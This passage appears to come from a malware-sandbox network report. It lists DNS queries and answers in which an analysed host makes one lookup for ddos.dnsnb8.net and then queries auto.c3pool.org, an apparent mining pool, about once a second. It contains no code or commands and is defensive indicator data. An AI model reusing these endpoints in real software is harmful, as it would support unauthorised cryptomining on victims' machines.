Jul 25, 2024 12:03:19.375041962 CEST	53	53462	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:20.368551970 CEST	53268	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:20.457652092 CEST	53268	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:20.464699984 CEST	53	53268	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:20.531657934 CEST	53	53268	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:22.225433111 CEST	54863	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:22.262551069 CEST	53	54863	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:23.324403048 CEST	51912	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:23.358197927 CEST	53	51912	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:24.319945097 CEST	63419	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:24.410690069 CEST	63419	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:24.847480059 CEST	53	63419	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:24.847496033 CEST	53	63419	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:25.833746910 CEST	64731	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:25.926315069 CEST	64731	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:26.004996061 CEST	53	64731	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:26.005053043 CEST	53	64731	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:26.833252907 CEST	55865	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:26.845427036 CEST	53	55865	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:27.834420919 CEST	54660	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:27.926628113 CEST	54660	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:28.779844046 CEST	53	54660	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:28.780181885 CEST	53	54660	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:29.794543028 CEST	64614	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:29.893781900 CEST	53	64614	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:30.600023031 CEST	64614	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:30.607336998 CEST	53	64614	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:31.662549973 CEST	65115	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:31.678342104 CEST	53	65115	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:32.683623075 CEST	50587	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:32.697575092 CEST	53	50587	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 11:59:27.472111940 CEST	192.168.2.4	1.1.1.1	0x52ba	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:28.165363073 CEST	192.168.2.4	1.1.1.1	0x9f71	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:29.146353960 CEST	192.168.2.4	1.1.1.1	0xe260	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:30.166480064 CEST	192.168.2.4	1.1.1.1	0x2567	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:31.165967941 CEST	192.168.2.4	1.1.1.1	0x31ef	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:32.161283970 CEST	192.168.2.4	1.1.1.1	0x5962	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:33.161194086 CEST	192.168.2.4	1.1.1.1	0xd9c4	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:34.382622957 CEST	192.168.2.4	1.1.1.1	0x4755	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:35.380345106 CEST	192.168.2.4	1.1.1.1	0xe17d	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:36.382529974 CEST	192.168.2.4	1.1.1.1	0xcb22	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:37.380928040 CEST	192.168.2.4	1.1.1.1	0xdbe4	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:38.645776987 CEST	192.168.2.4	1.1.1.1	0xcab2	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:39.645586014 CEST	192.168.2.4	1.1.1.1	0x8e03	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:40.662950993 CEST	192.168.2.4	1.1.1.1	0x2c51	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:41.756216049 CEST	192.168.2.4	1.1.1.1	0x611a	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:42.989684105 CEST	192.168.2.4	1.1.1.1	0xadff	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:43.989581108 CEST	192.168.2.4	1.1.1.1	0xc0e0	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:44.990056992 CEST	192.168.2.4	1.1.1.1	0x5100	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:45.989835024 CEST	192.168.2.4	1.1.1.1	0x6d20	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:47.459814072 CEST	192.168.2.4	1.1.1.1	0xc34	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:48.739620924 CEST	192.168.2.4	1.1.1.1	0xbc81	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:49.739975929 CEST	192.168.2.4	1.1.1.1	0xa6b7	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:50.740645885 CEST	192.168.2.4	1.1.1.1	0x5cd1	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:52.255629063 CEST	192.168.2.4	1.1.1.1	0xd438	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:53.270745993 CEST	192.168.2.4	1.1.1.1	0x271c	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:54.270809889 CEST	192.168.2.4	1.1.1.1	0x184f	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:55.286232948 CEST	192.168.2.4	1.1.1.1	0xcad	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:56.286535025 CEST	192.168.2.4	1.1.1.1	0xa6de	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:57.301881075 CEST	192.168.2.4	1.1.1.1	0x546c	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:58.302088976 CEST	192.168.2.4	1.1.1.1	0xb349	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:59.348089933 CEST	192.168.2.4	1.1.1.1	0x30cf	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:00.349076033 CEST	192.168.2.4	1.1.1.1	0x5a27	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:01.349868059 CEST	192.168.2.4	1.1.1.1	0x83d	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:02.364711046 CEST	192.168.2.4	1.1.1.1	0x7fe4	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:03.364912987 CEST	192.168.2.4	1.1.1.1	0xc838	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:04.380990028 CEST	192.168.2.4	1.1.1.1	0x9324	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:05.411453962 CEST	192.168.2.4	1.1.1.1	0xe1d5	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:06.411890030 CEST	192.168.2.4	1.1.1.1	0x98f1	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:07.414388895 CEST	192.168.2.4	1.1.1.1	0x9742	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:08.427323103 CEST	192.168.2.4	1.1.1.1	0xf52f	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:09.442576885 CEST	192.168.2.4	1.1.1.1	0x44e0	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:10.443088055 CEST	192.168.2.4	1.1.1.1	0xe3c6	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:11.599633932 CEST	192.168.2.4	1.1.1.1	0xeac8	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:12.599097967 CEST	192.168.2.4	1.1.1.1	0xca32	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:13.600505114 CEST	192.168.2.4	1.1.1.1	0xa468	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:13.691914082 CEST	192.168.2.4	1.1.1.1	0xa468	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:15.258119106 CEST	192.168.2.4	1.1.1.1	0x1a24	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:16.257081985 CEST	192.168.2.4	1.1.1.1	0x3bdf	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:17.257148027 CEST	192.168.2.4	1.1.1.1	0xe995	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:17.348299026 CEST	192.168.2.4	1.1.1.1	0xe995	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:18.364696980 CEST	192.168.2.4	1.1.1.1	0xdc1e	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:19.366615057 CEST	192.168.2.4	1.1.1.1	0x2f68	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:20.368551970 CEST	192.168.2.4	1.1.1.1	0xb5d4	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:20.457652092 CEST	192.168.2.4	1.1.1.1	0xb5d4	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:22.225433111 CEST	192.168.2.4	1.1.1.1	0x48f2	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:23.324403048 CEST	192.168.2.4	1.1.1.1	0x7ab4	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:24.319945097 CEST	192.168.2.4	1.1.1.1	0xd24	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:24.410690069 CEST	192.168.2.4	1.1.1.1	0xd24	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:25.833746910 CEST	192.168.2.4	1.1.1.1	0x1a31	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:25.926315069 CEST	192.168.2.4	1.1.1.1	0x1a31	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:26.833252907 CEST	192.168.2.4	1.1.1.1	0x64f6	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:27.834420919 CEST	192.168.2.4	1.1.1.1	0x6922	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:27.926628113 CEST	192.168.2.4	1.1.1.1	0x6922	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:29.794543028 CEST	192.168.2.4	1.1.1.1	0x9868	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:30.600023031 CEST	192.168.2.4	1.1.1.1	0x9868	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:31.662549973 CEST	192.168.2.4	1.1.1.1	0x425d	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:32.683623075 CEST	192.168.2.4	1.1.1.1	0x31de	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 11:59:27.481487989 CEST	1.1.1.1	192.168.2.4	0x52ba	No error (0)	ddos.dnsnb8.net	44.221.84.105	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:28.332082033 CEST	1.1.1.1	192.168.2.4	0x9f71	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:28.332082033 CEST	1.1.1.1	192.168.2.4	0x9f71	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:29.242415905 CEST	1.1.1.1	192.168.2.4	0xe260	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:29.242415905 CEST	1.1.1.1	192.168.2.4	0xe260	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:30.176345110 CEST	1.1.1.1	192.168.2.4	0x2567	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:30.176345110 CEST	1.1.1.1	192.168.2.4	0x2567	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:31.174592018 CEST	1.1.1.1	192.168.2.4	0x31ef	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:31.174592018 CEST	1.1.1.1	192.168.2.4	0x31ef	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:32.261459112 CEST	1.1.1.1	192.168.2.4	0x5962	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:32.261459112 CEST	1.1.1.1	192.168.2.4	0x5962	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:33.378659010 CEST	1.1.1.1	192.168.2.4	0xd9c4	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:33.378659010 CEST	1.1.1.1	192.168.2.4	0xd9c4	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:34.394407988 CEST	1.1.1.1	192.168.2.4	0x4755	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:34.394407988 CEST	1.1.1.1	192.168.2.4	0x4755	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:35.462176085 CEST	1.1.1.1	192.168.2.4	0xe17d	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:35.462176085 CEST	1.1.1.1	192.168.2.4	0xe17d	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:36.392015934 CEST	1.1.1.1	192.168.2.4	0xcb22	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:36.392015934 CEST	1.1.1.1	192.168.2.4	0xcb22	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:37.627830029 CEST	1.1.1.1	192.168.2.4	0xdbe4	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:37.627830029 CEST	1.1.1.1	192.168.2.4	0xdbe4	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:38.657484055 CEST	1.1.1.1	192.168.2.4	0xcab2	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:38.657484055 CEST	1.1.1.1	192.168.2.4	0xcab2	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:39.662760973 CEST	1.1.1.1	192.168.2.4	0x8e03	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:39.662760973 CEST	1.1.1.1	192.168.2.4	0x8e03	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:40.759813070 CEST	1.1.1.1	192.168.2.4	0x2c51	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:40.759813070 CEST	1.1.1.1	192.168.2.4	0x2c51	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:41.979935884 CEST	1.1.1.1	192.168.2.4	0x611a	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:41.979935884 CEST	1.1.1.1	192.168.2.4	0x611a	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:42.999197960 CEST	1.1.1.1	192.168.2.4	0xadff	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:42.999197960 CEST	1.1.1.1	192.168.2.4	0xadff	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:44.002315044 CEST	1.1.1.1	192.168.2.4	0xc0e0	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:44.002315044 CEST	1.1.1.1	192.168.2.4	0xc0e0	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:44.999610901 CEST	1.1.1.1	192.168.2.4	0x5100	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:44.999610901 CEST	1.1.1.1	192.168.2.4	0x5100	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:46.454554081 CEST	1.1.1.1	192.168.2.4	0x6d20	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:46.454554081 CEST	1.1.1.1	192.168.2.4	0x6d20	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:47.634426117 CEST	1.1.1.1	192.168.2.4	0xc34	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:47.634426117 CEST	1.1.1.1	192.168.2.4	0xc34	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:48.901732922 CEST	1.1.1.1	192.168.2.4	0xbc81	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:48.901732922 CEST	1.1.1.1	192.168.2.4	0xbc81	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:49.751717091 CEST	1.1.1.1	192.168.2.4	0xa6b7	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:49.751717091 CEST	1.1.1.1	192.168.2.4	0xa6b7	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:51.250427961 CEST	1.1.1.1	192.168.2.4	0x5cd1	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:51.250427961 CEST	1.1.1.1	192.168.2.4	0x5cd1	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:52.265348911 CEST	1.1.1.1	192.168.2.4	0xd438	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:52.265348911 CEST	1.1.1.1	192.168.2.4	0xd438	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:53.364348888 CEST	1.1.1.1	192.168.2.4	0x271c	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:53.364348888 CEST	1.1.1.1	192.168.2.4	0x271c	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:54.280977964 CEST	1.1.1.1	192.168.2.4	0x184f	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:54.280977964 CEST	1.1.1.1	192.168.2.4	0x184f	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:55.298856974 CEST	1.1.1.1	192.168.2.4	0xcad	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:55.298856974 CEST	1.1.1.1	192.168.2.4	0xcad	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:56.294533968 CEST	1.1.1.1	192.168.2.4	0xa6de	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:56.294533968 CEST	1.1.1.1	192.168.2.4	0xa6de	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:57.403168917 CEST	1.1.1.1	192.168.2.4	0x546c	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:57.403168917 CEST	1.1.1.1	192.168.2.4	0x546c	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:58.312371016 CEST	1.1.1.1	192.168.2.4	0xb349	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:58.312371016 CEST	1.1.1.1	192.168.2.4	0xb349	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:59.358144999 CEST	1.1.1.1	192.168.2.4	0x30cf	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:02:59.358144999 CEST	1.1.1.1	192.168.2.4	0x30cf	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:00.366846085 CEST	1.1.1.1	192.168.2.4	0x5a27	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:00.366846085 CEST	1.1.1.1	192.168.2.4	0x5a27	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:01.512070894 CEST	1.1.1.1	192.168.2.4	0x83d	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:01.512070894 CEST	1.1.1.1	192.168.2.4	0x83d	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:02.373325109 CEST	1.1.1.1	192.168.2.4	0x7fe4	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:02.373325109 CEST	1.1.1.1	192.168.2.4	0x7fe4	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:03.376569986 CEST	1.1.1.1	192.168.2.4	0xc838	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:03.376569986 CEST	1.1.1.1	192.168.2.4	0xc838	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:04.391307116 CEST	1.1.1.1	192.168.2.4	0x9324	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:04.391307116 CEST	1.1.1.1	192.168.2.4	0x9324	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:05.421170950 CEST	1.1.1.1	192.168.2.4	0xe1d5	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:05.421170950 CEST	1.1.1.1	192.168.2.4	0xe1d5	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:06.419838905 CEST	1.1.1.1	192.168.2.4	0x98f1	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:06.419838905 CEST	1.1.1.1	192.168.2.4	0x98f1	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:07.507802010 CEST	1.1.1.1	192.168.2.4	0x9742	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:07.507802010 CEST	1.1.1.1	192.168.2.4	0x9742	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:08.436698914 CEST	1.1.1.1	192.168.2.4	0xf52f	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:08.436698914 CEST	1.1.1.1	192.168.2.4	0xf52f	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:09.453562975 CEST	1.1.1.1	192.168.2.4	0x44e0	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:09.453562975 CEST	1.1.1.1	192.168.2.4	0x44e0	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:10.452605963 CEST	1.1.1.1	192.168.2.4	0xe3c6	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:10.452605963 CEST	1.1.1.1	192.168.2.4	0xe3c6	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:11.609930992 CEST	1.1.1.1	192.168.2.4	0xeac8	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:11.609930992 CEST	1.1.1.1	192.168.2.4	0xeac8	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:12.607680082 CEST	1.1.1.1	192.168.2.4	0xca32	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:12.607680082 CEST	1.1.1.1	192.168.2.4	0xca32	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:13.771753073 CEST	1.1.1.1	192.168.2.4	0xa468	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:13.771753073 CEST	1.1.1.1	192.168.2.4	0xa468	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:15.268265963 CEST	1.1.1.1	192.168.2.4	0x1a24	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:15.268265963 CEST	1.1.1.1	192.168.2.4	0x1a24	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
